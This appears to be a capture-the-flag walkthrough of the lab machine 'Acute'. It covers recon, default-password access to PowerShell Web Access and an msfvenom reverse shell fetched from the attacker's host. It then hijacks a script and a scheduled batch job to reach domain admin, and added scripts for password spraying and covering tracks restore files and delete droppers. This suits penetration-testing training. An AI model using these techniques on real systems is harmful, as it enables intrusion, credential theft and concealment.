
Acute

We always start with an nmap scan.

nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.145
# Nmap 7.91 scan initiated Wed Feb 16 14:29:52 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.27s latency).
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb 16 14:31:33 2022 -- 1 IP address (1 host up) scanned in 101.32 seconds

Only one port is open, 443/HTTPS; the other 65534 are filtered, so a firewall is dropping everything else. Run default scripts and version detection against it:

nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
# Nmap 7.91 scan initiated Wed Feb 16 14:29:26 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 443 10.10.11.145
Nmap scan report for 10.10.11.145
Host is up (0.29s latency).

PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after:  2030-01-04T06:34:58
|_ssl-date: 2022-02-16T16:29:37+00:00; +2h59m36s from scanner time.
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2h59m35s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 16 14:30:03 2022 -- 1 IP address (1 host up) scanned in 36.87 seconds

The TLS certificate gives away the hostname. Add it to /etc/hosts:

10.10.11.145 atsserver.acute.local atsserver

Then browse to https://atsserver.acute.local/ to see what is running.

Looking around the site for hints that could push enumeration forward, the staff names stand out. From them, build a username list in first-initial-plus-surname form; it may be useful later:

Awallace
Chall
Edavies
Imonks
Jmorgan
Lhopkins

A "New Starter Forms" link looks interesting. Clicking it downloads a Word document, which turns out to be an onboarding checklist. One item in it is promising:

Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the remote training.

The word "remote" in that item is a hyperlink. It leads to a staff portal that turns out to be Windows PowerShell Web Access (PSWA):

https://atsserver.acute.local/Acute_Staff_Access/

PSWA needs a username, a password and a target computer name. The checklist gives the default password for new starters, Password1!, and the document's metadata (exiftool) gives the computer name, Acute-PC01. Trying Password1! with each name on the user list, edavies logs in to Acute-PC01. The web console is awkward to work in, so the first job is a proper reverse shell back to our terminal.

└─$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.13 LPORT=1337 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes

Then open msfconsole and configure the listener. The handler payload has to match what msfvenom produced (the stageless x64 meterpreter_reverse_tcp, not the staged x86 one), and LHOST must be our tun0 address at the time the payload runs:

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost tun0
set lport 1337
run

With the payload built, find a folder on the target that edavies can write to; C:\utils works. Serve shell.exe over HTTP from our box (port 8000 here) and fetch it from the PSWA console:

Invoke-WebRequest "http://10.10.14.52:8000/shell.exe" -OutFile "shell.exe"

Start the listener before executing the payload, then run shell.exe from the PSWA console.

With a meterpreter session, the screenshare command streams edavies' desktop to our browser so we can watch what is happening at the console. The stream shows a PowerShell window in which imonks' password is typed into a PSCredential and used with Invoke-Command against ATSSERVER through the dc_manage session configuration.

Recreate that credential object and use Invoke-Command to run commands as imonks. The -ConfigurationName dc_manage parameter selects a registered session configuration on ATSSERVER; a session configuration can limit what the remote session is allowed to run, and every later command goes through it.

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

Jumping ahead to one use of the wm.ps1 script found on imonks' desktop (enumerated below): after swapping its Get-Volume call for `net localgroup administrators edavies /add`, running the script through Invoke-Command executes that command on Acute-PC01 as jmorgan. Re-checking the local Administrators group shows the result.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock{C:\Users\imonks\Desktop\wm.ps1} -Credential $cred
The command completed successfully.


PS C:\utils> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\edavies
ACUTE\jmorgan
Administrator
The command completed successfully.

Indeed, edavies is now a local administrator on Acute-PC01.
Note: group membership is evaluated when the logon token is built, so for the new permissions to take effect, log off and back on as edavies in the PSWA session.


We can now run commands on ATSSERVER as imonks. Enumerate the user profiles:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users} -credential $cred

More users to look at later. First, imonks' own desktop:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/imonks/desktop} -credential $cred

For the local-admin route used above, the edit of wm.ps1 and the check of the result are:

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','net localgroup administrators edavies /add') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred
Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content c:\users\imonks\Desktop\wm.ps1} -credential $cred

imonks' desktop holds user.txt and a PowerShell script, wm.ps1. Reading it:

The script is promising: it builds a PSCredential for jmorgan from a password stored in it and runs `Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds`. Whatever replaces Get-Volume therefore runs on Acute-PC01 as jmorgan. Swap Get-Volume for the path of a reverse-shell executable (rev.exe, staged in C:\utils):

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock{((Get-Content "c:\users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','cmd.exe /c c:\utils\rev.exe') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $cred

Now run the modified script with Invoke-Command again (listener started first):

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1} -credential $cred
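The edit-run-restore sequence for wm.ps1, as an added example that is not part of the original writeup. It assumes imonks' $cred from above, the writeup's paths, and that rev.exe is already in C:\utils on Acute-PC01; the backup, the sanity check and the restore are my additions. The same block serves the local-admin variant by setting $Payload to `net localgroup administrators edavies /add`.

```powershell
# Added example, not from the original writeup: hijack the Invoke-Command in wm.ps1,
# keep a copy of the original, and put it back when done.
$Script  = 'C:\Users\imonks\Desktop\wm.ps1'
$Payload = 'cmd.exe /c c:\utils\rev.exe'        # whatever replaces Get-Volume runs on Acute-PC01 as jmorgan
$remote  = @{ ComputerName = 'ATSSERVER'; ConfigurationName = 'dc_manage'; Credential = $cred }

# 1. Fetch the original so it can be restored afterwards.
$original = Invoke-Command @remote -ScriptBlock { param($p) Get-Content -Path $p -Raw } -ArgumentList $Script
if ($original -notmatch 'Get-Volume') { throw "wm.ps1 does not contain Get-Volume; not patching" }

# 2. Swap the benign command. Everything else, including the jmorgan PSCredential
#    and -ComputerName Acute-PC01, stays exactly as it was.
$patched = $original -replace 'Get-Volume', $Payload
Invoke-Command @remote -ScriptBlock { param($p, $c) Set-Content -Path $p -Value $c } -ArgumentList $Script, $patched

# 3. Run it as a background job: a connected reverse shell keeps rev.exe alive, which keeps
#    the script, and so a plain Invoke-Command, from returning. Start the listener first.
$job = Invoke-Command @remote -ScriptBlock { param($p) & $p } -ArgumentList $Script -AsJob
Start-Sleep -Seconds 15

# 4. Restore the original content so the script looks untouched to anyone else.
Invoke-Command @remote -ScriptBlock { param($p, $c) Set-Content -Path $p -Value $c } -ArgumentList $Script, $original
Write-Host "Job state: $($job.State)"   # stays Running while the shell is connected
```

Restoring the file does not kill the shell: the script has already executed its Invoke-Command by then, and the running rev.exe on Acute-PC01 is independent of the file's contents.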

Back on the listener, we have a shell as jmorgan. jmorgan is a member of the local Administrators group on Acute-PC01, so the local SAM hashes can be dumped and the local Administrator hash cracked: it gives Password@123.

That password goes nowhere against the domain Administrator account, so the next thing to try is password reuse. Flashing back to the enumeration of C:\Users on ATSSERVER, there are users we have no access to yet; test the cracked password against each of them with the same PSCredential and Invoke-Command pattern as before.
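The password-reuse check described above, looped over every known user, as an added example that is not part of the original writeup. It assumes the writeup's endpoint (ATSSERVER, dc_manage), the user list built from the website, and that it runs from the edavies PSWA console on the domain-joined Acute-PC01; the lockout-policy check and the loop are mine.

```powershell
# Added example, not from the original writeup: spray one cracked password across the
# known domain users through the dc_manage endpoint, after checking the lockout policy.
$Users    = 'awallace','chall','edavies','imonks','jmorgan','lhopkins'   # from the staff page
$Password = 'Password@123'        # cracked local Administrator password from Acute-PC01
$Secure   = ConvertTo-SecureString $Password -AsPlainText -Force

# One wrong guess per account is only safe if the lockout threshold allows it.
# "Lockout threshold: Never" means no lockout; otherwise stay below the threshold.
$policy = net accounts /domain | Select-String 'Lockout threshold'
Write-Host "[*] $policy"

foreach ($u in $Users) {
    $cred = New-Object System.Management.Automation.PSCredential ("acute\$u", $Secure)
    try {
        # -ErrorAction Stop turns a failed logon or a refused endpoint into a catchable exception
        $who = Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage `
                              -ScriptBlock { whoami } -Credential $cred -ErrorAction Stop
        Write-Host "[+] $u : $Password -> $who"
    } catch {
        # First line of the message carries the WinRM/Kerberos reason, e.g. "Access is denied"
        Write-Host "[-] $u : $($_.Exception.Message -split "`n" | Select-Object -First 1)"
    }
}
```

Each iteration is a separate network logon against the DC, so every failure is one bad-password count on that account; check `net accounts /domain` first rather than assuming the policy.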

$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {whoami} -credential $cred

Password@123 works for awallace. Enumerate the DC as awallace, starting with Program Files:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"} -credential $cred

One folder is not standard and looks interesting: Keepmeon. List it:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /"program files"/keepmeon} -credential $cred

It holds a single batch file, keepmeon.bat. Read it to see what it does:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /"program files"/keepmeon/keepmeon.bat} -credential $cred

Its comment says it runs every five minutes, the Windows equivalent of a cron job, and that it is for Lois's use only:

REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
    if not "%%x" == "%~0" call "%%x"
)

Breaking it down: `for /R` walks the current directory tree for every *.bat file and `call`s each one except the script itself (%~0). Any .bat we drop into Keepmeon will therefore be executed within five minutes in Lois's context. Back to the onboarding document we found first:

**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin.**

So Lois can change group membership. Drop a .bat that adds awallace to site_admin and wait five minutes for the job to run it:

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\admin.bat' -Value 'net group site_admin awallace /add /domain'}

After the job has fired, confirm that awallace is now in the site_admin group:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {net group site_admin} -credential $cred
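The drop-and-wait step automated, as an added example that is not part of the original writeup. It assumes awallace's $cred from above, the writeup's paths and group name, and that Remove-Item is permitted through the dc_manage endpoint (the page only shows Set-Content, Get-Content, Get-ChildItem and net being used there); the polling loop, the timeout and the cleanup are my additions.

```powershell
# Added example, not from the original writeup: drop a .bat for Lois's 5-minute job,
# poll Site_Admin until the membership lands, remove the dropper, then use the new access.
$User    = 'awallace'
$BatPath = 'C:\Program Files\Keepmeon\admin.bat'   # any *.bat under Keepmeon gets called
$remote  = @{ ComputerName = 'ATSSERVER'; ConfigurationName = 'dc_manage'; Credential = $cred }

# 1. The one-liner that keepmeon.bat will call in Lois's context.
Invoke-Command @remote -ScriptBlock {
    param($p, $u) Set-Content -Path $p -Value "net group site_admin $u /add /domain"
} -ArgumentList $BatPath, $User

# 2. The job fires every five minutes, so poll for up to seven before giving up.
$deadline = (Get-Date).AddMinutes(7)
do {
    Start-Sleep -Seconds 30
    $members = Invoke-Command @remote -ScriptBlock { net group site_admin /domain }
    $added   = [bool]($members | Select-String -Pattern "\b$User\b" -Quiet)
    Write-Host ("[{0:HH:mm:ss}] {1} in Site_Admin: {2}" -f (Get-Date), $User, $added)
} until ($added -or (Get-Date) -gt $deadline)

# 3. Remove the dropper: otherwise it is re-run every five minutes and stays on disk as evidence.
#    Assumes Remove-Item is allowed by the dc_manage session configuration.
Invoke-Command @remote -ScriptBlock { param($p) Remove-Item -Path $p -Force } -ArgumentList $BatPath
if (-not $added) { throw "Timed out waiting for the Keepmeon job" }

# 4. Group membership goes into the logon token at logon; each Invoke-Command with
#    -Credential is a fresh logon, so the new membership applies immediately here.
Invoke-Command @remote -ScriptBlock { Get-Content 'C:\Users\Administrator\Desktop\root.txt' }
```

The membership check uses a word-boundary match because `net group` prints members in columns, several per line, rather than one per line.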

With awallace in site_admin, whose description says it has access to the Domain Admins group, the Administrator profile is readable. Each Invoke-Command with -Credential is a fresh logon, so the new membership is in the token without any further steps. Time for root.txt:

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {ls /users/administrator/desktop} -credential $cred

invoke-Command -computername atsserver -ConfigurationName dc_manage  -ScriptBlock {cat /users/administrator/desktop/root.txt} -credential $cred

Console transcript of the awallace steps above, with output:

PS C:\utils> $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $passwd)
PS C:\utils> invoke-Command -computername atsserver -ConfigurationName dc_manage -ScriptBlock {whoami} -credential $cred
acute\awallace
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-ChildItem 'C:\Program Files\Keepmeon\'} -Credential $cred


Directory: C:\Program Files\Keepmeon


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER


PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Get-Content 'C:\Program Files\Keepmeon\keepmeon.bat'} -Credential $cred
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)

A second run from a separate session (note the 09/09/2022 timestamp on imonks.bat), still as awallace, this time dropping a .bat that adds imonks to Site_Admin:

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

The Site_Admin description says it has access to the Domain Admins group, which is the final goal. So, drop a script that, when Lois's keepmeon.bat job calls it, adds imonks to Site_Admin:

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group site_admin /domain} -Credential $cred
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

Checked straight away, the group is still empty because the job has not fired yet. Write the file once more and confirm it is in place:

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {Set-Content -Path 'c:\program files\Keepmeon\imonks.bat' -Value 'net group site_admin imonks /add /domain'} -Credential $cred
PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-childitem 'c:\program files\Keepmeon\'} -Credential $cred


Directory: C:\program files\Keepmeon


Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 09/09/2022 13:43 42 imonks.bat ATSSERVER
-a---- 21/12/2021 14:57 128 keepmeon.bat ATSSERVER


After five minutes or so, check the members of Site_Admin once more to make sure imonks was added. Since the group description says it has access to Domain Admins, switch to imonks' credential and try to add imonks to Domain Admins directly:

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $passwd)


PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" imonks /add /domain} -Credential $cred
System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ PSComputerName : ATSSERVER

NotSpecified: (:String) [], RemoteException
Access is denied.
NotSpecified: (:String) [], RemoteException

The direct add is denied (System error 5, access denied). Listing Domain Admins shows only Administrator; note that `net group` lists user accounts only, never nested groups, so Site_Admin being a member of Domain Admins would not show up here. Reading root.txt as imonks succeeds regardless:

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {net group "Domain Admins" /domain} -Credential $cred
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.

PS C:\utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -ScriptBlock {get-content C:\Users\Administrator\Desktop\root.txt} -Credential $cred
91ac558b60398bde3b9fe9d00f7767da
